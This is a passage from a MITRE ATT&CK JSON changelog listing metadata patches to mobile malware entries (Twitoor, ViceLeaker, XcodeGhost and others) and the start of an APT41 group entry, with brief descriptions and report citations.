"Trojan-SMS.AndroidOS.Agent.ao", + "description": "(Citation: Kaspersky-MobileMalware)" + }, + { + "source_name": "Kaspersky-MobileMalware", + "description": "Roman Unuchek and Victor Chebyshev. (2014, February 24). Mobile Malware Evolution: 2013. 
Retrieved December 22, 2016.", + "url": "https://securelist.com/mobile-malware-evolution-2013/58335/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:34.229000+00:00\", \"old_value\": \"2025-04-16 21:22:11.724000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--28e39395-91e7-4f02-b694-5e079c964da9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:46.107000+00:00", + "modified": "2025-04-25 14:40:20.063000+00:00", + "name": "Trojan-SMS.AndroidOS.FakeInst.a", + "description": "[Trojan-SMS.AndroidOS.FakeInst.a](https://attack.mitre.org/software/S0306) is Android malware. (Citation: Kaspersky-MobileMalware)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0306", + "external_id": "S0306" + }, + { + "source_name": "Trojan-SMS.AndroidOS.FakeInst.a", + "description": "(Citation: Kaspersky-MobileMalware)" + }, + { + "source_name": "Kaspersky-MobileMalware", + "description": "Roman Unuchek and Victor Chebyshev. (2014, February 24). Mobile Malware Evolution: 2013. 
Retrieved December 22, 2016.", + "url": "https://securelist.com/mobile-malware-evolution-2013/58335/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:20.063000+00:00\", \"old_value\": \"2025-04-16 21:22:05.907000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--d89c132d-7752-4c7f-9372-954a71522985", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:46.734000+00:00", + "modified": "2025-04-25 14:40:41.844000+00:00", + "name": "Trojan-SMS.AndroidOS.OpFake.a", + "description": "[Trojan-SMS.AndroidOS.OpFake.a](https://attack.mitre.org/software/S0308) is Android malware. (Citation: Kaspersky-MobileMalware)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0308", + "external_id": "S0308" + }, + { + "source_name": "Trojan-SMS.AndroidOS.OpFake.a", + "description": "(Citation: Kaspersky-MobileMalware)" + }, + { + "source_name": "Kaspersky-MobileMalware", + "description": "Roman Unuchek and Victor Chebyshev. (2014, February 24). Mobile Malware Evolution: 2013. 
Retrieved December 22, 2016.", + "url": "https://securelist.com/mobile-malware-evolution-2013/58335/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:41.844000+00:00\", \"old_value\": \"2025-04-16 21:22:14.410000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--41e3fd01-7b83-471f-835d-d2b1dc9a770c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:42.313000+00:00", + "modified": "2025-04-25 14:40:24.958000+00:00", + "name": "Twitoor", + "description": "[Twitoor](https://attack.mitre.org/software/S0302) is a dropper application capable of receiving commands from social media.(Citation: ESET-Twitoor)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0302", + "external_id": "S0302" + }, + { + "source_name": "Twitoor", + "description": "(Citation: ESET-Twitoor)" + }, + { + "source_name": "ESET-Twitoor", + "description": "ESET. (2016, August 24). First Twitter-controlled Android botnet discovered. 
Retrieved December 22, 2016.", + "url": "http://www.welivesecurity.com/2016/08/24/first-twitter-controlled-android-botnet-discovered/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Twitoor" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:24.958000+00:00\", \"old_value\": \"2025-04-16 21:22:07.968000+00:00\"}}}", + "previous_version": "2.0" + }, + { + "type": "malware", + "id": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-11-21 16:42:48.203000+00:00", + "modified": "2025-04-25 14:40:30.243000+00:00", + "name": "ViceLeaker", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) is a spyware framework, capable of extensive surveillance and data exfiltration operations, primarily targeting devices belonging to Israeli citizens.(Citation: SecureList - ViceLeaker 2019)(Citation: Bitdefender - Triout 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0418", + "external_id": "S0418" + }, + { + "source_name": "ViceLeaker", + "description": "(Citation: SecureList - ViceLeaker 2019)" + }, + { + "source_name": "Triout", + "description": "(Citation: SecureList - ViceLeaker 2019)" + }, + { + "source_name": "SecureList - ViceLeaker 2019", + "description": "GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. 
Retrieved November 21, 2019.", + "url": "https://securelist.com/fanning-the-flames-viceleaker-operation/90877/" + }, + { + "source_name": "Bitdefender - Triout 2018", + "description": "L. Arsene, C. Ochinca. (2018, August 20). Triout \u2013 Spyware Framework for Android with Extensive Surveillance Capabilities. Retrieved January 21, 2020.", + "url": "https://labs.bitdefender.com/2018/08/triout-spyware-framework-for-android-with-extensive-surveillance-capabilities/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "ViceLeaker", + "Triout" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:30.243000+00:00\", \"old_value\": \"2025-04-16 21:22:10.060000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--f666e17c-b290-43b3-8947-b96bd5148fbb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-11 16:22:02.954000+00:00", + "modified": "2025-04-25 14:40:45.280000+00:00", + "name": "ViperRAT", + "description": "[ViperRAT](https://attack.mitre.org/software/S0506) is sophisticated surveillanceware that has been in operation since at least 2015 and was used to target the Israeli Defense Force.(Citation: Lookout ViperRAT) ", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0506", + "external_id": "S0506" + }, + { + "source_name": "Lookout ViperRAT", + "description": "M. Flossman. (2017, February 16). 
ViperRAT: The mobile APT targeting the Israeli Defense Force that should be on your radar. Retrieved September 11, 2020.", + "url": "https://blog.lookout.com/viperrat-mobile-apt" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "ViperRAT" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:45.280000+00:00\", \"old_value\": \"2025-04-16 21:22:15.850000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--326eaf7b-5784-4f08-8fc2-61fd5d5bc5fb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:37.020000+00:00", + "modified": "2025-04-25 14:40:21.687000+00:00", + "name": "WireLurker", + "description": "[WireLurker](https://attack.mitre.org/software/S0312) is a family of macOS malware that targets iOS devices connected over USB. (Citation: PaloAlto-WireLurker)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0312", + "external_id": "S0312" + }, + { + "source_name": "WireLurker", + "description": "Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. Retrieved July 10, 2017.", + "url": "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" + }, + { + "source_name": "PaloAlto-WireLurker", + "description": "Claud Xiao. (2014, November 5). WireLurker: A New Era in OS X and iOS Malware. 
Retrieved January 24, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2014/11/wirelurker-new-era-os-x-ios-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:21.687000+00:00\", \"old_value\": \"2025-04-16 21:22:06.693000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-07-20 13:27:33.113000+00:00", + "modified": "2025-04-25 14:40:42.935000+00:00", + "name": "WolfRAT", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) is malware based on a leaked version of [Dendroid](https://attack.mitre.org/software/S0301) that has primarily targeted Thai users. [WolfRAT](https://attack.mitre.org/software/S0489) has most likely been operated by the now defunct organization Wolf Research.(Citation: Talos-WolfRAT) ", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0489", + "external_id": "S0489" + }, + { + "source_name": "Talos-WolfRAT", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . 
Retrieved July 20, 2020.", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "WolfRAT" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:42.935000+00:00\", \"old_value\": \"2025-04-16 21:22:14.905000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--56660521-6db4-4e5a-a927-464f22954b7c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:42.034000+00:00", + "modified": "2025-04-25 14:40:26.968000+00:00", + "name": "X-Agent for Android", + "description": "[X-Agent for Android](https://attack.mitre.org/software/S0314) is Android malware that was placed in a repackaged version of a Ukrainian artillery targeting application. The malware reportedly retrieved general location data on where the victim device was used, and therefore could likely indicate the potential location of Ukrainian artillery. (Citation: CrowdStrike-Android) Is it tracked separately from the [CHOPSTICK](https://attack.mitre.org/software/S0023).", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0314", + "external_id": "S0314" + }, + { + "source_name": "X-Agent for Android", + "description": "(Citation: CrowdStrike-Android)" + }, + { + "source_name": "CrowdStrike-Android", + "description": "CrowdStrike Global Intelligence Team. (2016). 
Use of Fancy Bear Android Malware in Tracking of Ukrainian FIeld Artillery Units. Retrieved February 6, 2017.", + "url": "https://www.crowdstrike.com/wp-content/brochures/FancyBearTracksUkrainianArtillery.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:26.968000+00:00\", \"old_value\": \"2025-04-16 21:22:08.784000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--2740eaf6-2db2-4a40-a63f-f5b166c7059c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:40:19.697000+00:00", + "name": "XLoader for Android", + "description": "[XLoader for Android](https://attack.mitre.org/software/S0318) is a malicious Android app first observed targeting Japan, Korea, China, Taiwan, and Hong Kong in 2018. It has more recently been observed targeting South Korean users as a pornography application.(Citation: TrendMicro-XLoader-FakeSpy)(Citation: TrendMicro-XLoader) It is tracked separately from the [XLoader for iOS](https://attack.mitre.org/software/S0490).", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0318", + "external_id": "S0318" + }, + { + "source_name": "XLoader for Android", + "description": "(Citation: TrendMicro-XLoader)" + }, + { + "source_name": "TrendMicro-XLoader-FakeSpy", + "description": "Hiroaki, H., Wu, L., Wu, L.. (2019, April 2). 
XLoader Disguises as Android Apps, Has FakeSpy Links. Retrieved July 20, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/" + }, + { + "source_name": "TrendMicro-XLoader", + "description": "Lorin Wu. (2018, April 19). XLoader Android Spyware and Banking Trojan Distributed via DNS Spoofing. Retrieved July 6, 2018.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "XLoader for Android" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:19.697000+00:00\", \"old_value\": \"2025-04-16 21:22:05.761000+00:00\"}}}", + "previous_version": "2.0" + }, + { + "type": "malware", + "id": "malware--29944858-da52-4d3d-b428-f8a6eb8dde6f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-07-20 13:58:53.422000+00:00", + "modified": "2025-04-25 14:40:20.425000+00:00", + "name": "XLoader for iOS", + "description": "[XLoader for iOS](https://attack.mitre.org/software/S0490) is a malicious iOS application that is capable of gathering system information.(Citation: TrendMicro-XLoader-FakeSpy) It is tracked separately from the [XLoader for Android](https://attack.mitre.org/software/S0318).", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": 
"https://attack.mitre.org/software/S0490", + "external_id": "S0490" + }, + { + "source_name": "TrendMicro-XLoader-FakeSpy", + "description": "Hiroaki, H., Wu, L., Wu, L.. (2019, April 2). XLoader Disguises as Android Apps, Has FakeSpy Links. Retrieved July 20, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "XLoader for iOS" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:20.425000+00:00\", \"old_value\": \"2025-04-16 21:22:06.053000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "tool", + "id": "tool--da21929e-40c0-443d-bdf4-6b60d15448b4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:48.609000+00:00", + "modified": "2025-04-25 14:40:48.566000+00:00", + "name": "Xbot", + "description": "[Xbot](https://attack.mitre.org/software/S0298) is an Android malware family that was observed in 2016 primarily targeting Android users in Russia and Australia. (Citation: PaloAlto-Xbot)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0298", + "external_id": "S0298" + }, + { + "source_name": "Xbot", + "description": "(Citation: PaloAlto-Xbot)" + }, + { + "source_name": "PaloAlto-Xbot", + "description": "Cong Zheng, Claud Xiao and Zhi Xu. (2016, February 18). 
New Android Trojan \u201cXbot\u201d Phishes Credit Cards and Bank Accounts, Encrypts Devices for Ransom. Retrieved December 21, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:48.566000+00:00\", \"old_value\": \"2025-04-16 21:22:17.393000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--d9e07aea-baad-4b68-bdca-90c77647d7f9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:42.661000+00:00", + "modified": "2025-04-25 14:40:42.212000+00:00", + "name": "XcodeGhost", + "description": "[XcodeGhost](https://attack.mitre.org/software/S0297) is iOS malware that infected at least 39 iOS apps in 2015 and potentially affected millions of users. (Citation: PaloAlto-XcodeGhost1) (Citation: PaloAlto-XcodeGhost)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0297", + "external_id": "S0297" + }, + { + "source_name": "XcodeGhost", + "description": "(Citation: PaloAlto-XcodeGhost1) (Citation: PaloAlto-XcodeGhost)" + }, + { + "source_name": "PaloAlto-XcodeGhost1", + "description": "Claud Xiao. (2015, September 17). Novel Malware XcodeGhost Modifies Xcode, Infects Apple iOS Apps and Hits App Store. 
Retrieved December 21, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/09/novel-malware-xcodeghost-modifies-xcode-infects-apple-ios-apps-and-hits-app-store/" + }, + { + "source_name": "PaloAlto-XcodeGhost", + "description": "Claud Xiao. (2015, September 18). Update: XcodeGhost Attacker Can Phish Passwords and Open URLs through Infected Apps. Retrieved December 21, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/09/update-xcodeghost-attacker-can-phish-passwords-and-open-urls-though-infected-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:42.212000+00:00\", \"old_value\": \"2025-04-16 21:22:14.566000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--22faaa56-a8ac-4292-9be6-b571b255ee40", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-07-27 14:14:56.729000+00:00", + "modified": "2025-04-25 14:40:18.792000+00:00", + "name": "Zen", + "description": "[Zen](https://attack.mitre.org/software/S0494) is Android malware that was first seen in 2013.(Citation: Google Security Zen)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0494", + "external_id": "S0494" + }, + { + "source_name": "Google Security Zen", + "description": "Siewierski, L. (2019, January 11). PHA Family Highlights: Zen and its cousins . 
Retrieved July 27, 2020.", + "url": "https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Zen" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:18.792000+00:00\", \"old_value\": \"2025-04-16 21:22:05.422000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--3c3b55a6-c3e9-4043-8aae-283fe96220c0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:44.853000+00:00", + "modified": "2025-04-25 14:40:24.224000+00:00", + "name": "ZergHelper", + "description": "[ZergHelper](https://attack.mitre.org/software/S0287) is iOS riskware that was unique due to its apparent evasion of Apple's App Store review process. No malicious functionality was identified in the app, but it presents security risks. (Citation: Xiao-ZergHelper)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0287", + "external_id": "S0287" + }, + { + "source_name": "ZergHelper", + "description": "(Citation: Xiao-ZergHelper)" + }, + { + "source_name": "Xiao-ZergHelper", + "description": "Claud Xiao. (2016, February 21). Pirated iOS App Store\u2019s Client Successfully Evaded Apple iOS Code Review. 
Retrieved December 12, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/02/pirated-ios-app-stores-client-successfully-evaded-apple-ios-code-review/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:24.224000+00:00\", \"old_value\": \"2025-04-16 21:22:07.644000+00:00\"}}}", + "previous_version": "1.0" + } + ], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "groups": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [ + { + "type": "intrusion-set", + "id": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-09-23 13:43:36.945000+00:00", + "modified": "2025-04-22 21:56:33.318000+00:00", + "name": "APT41", + "description": "[APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting various industries, including but not limited to healthcare, telecom, technology, finance, education, retail and video game industries in 14 countries.(Citation: apt41_mandiant) Notable behaviors include using a wide range of malware and tools to complete mission objectives. 
[APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)\n", + "aliases": [ + "APT41", + "Wicked Panda", + "Brass Typhoon", + "BARIUM" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0096", + "external_id": "G0096" + }, + { + "source_name": "Wicked Panda", + "description": "(Citation: Crowdstrike GTR2020 Mar 2020)" + }, + { + "source_name": "APT41", + "description": "(Citation: FireEye APT41 2019)" + }, + { + "source_name": "Brass Typhoon", + "description": "(Citation: Microsoft Threat Actor Naming July 2023)" + }, + { + "source_name": "BARIUM", + "description": "(Citation: Microsoft Threat Actor Naming July 2023)" + }, + { + "source_name": "Crowdstrike GTR2020 Mar 2020", + "description": "Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.", + "url": "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf" + }, + { + "source_name": "FireEye APT41 2019", + "description": "FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.", + "url": "https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf" + }, + { + "source_name": "FireEye APT41 Aug 2019", + "description": "Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.", + "url": "https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf" + }, + { + "source_name": "apt41_mandiant", + "description": "Mandiant. (n.d.). APT41, A DUAL ESPIONAGE AND CYBER CRIME OPERATION. 
Retrieved June 11, 2024.", + "url": "https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf" + }, + { + "source_name": "Microsoft Threat Actor Naming July 2023", + "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.", + "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide" + }, + { + "source_name": "Group IB APT 41 June 2021", + "description": "Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.", + "url": "https://www.group-ib.com/blog/colunmtk-apt41/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Kyaw Pyiyt Htet, @KyawPyiytHtet", + "Nikita Rostovcev, Group-IB" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + 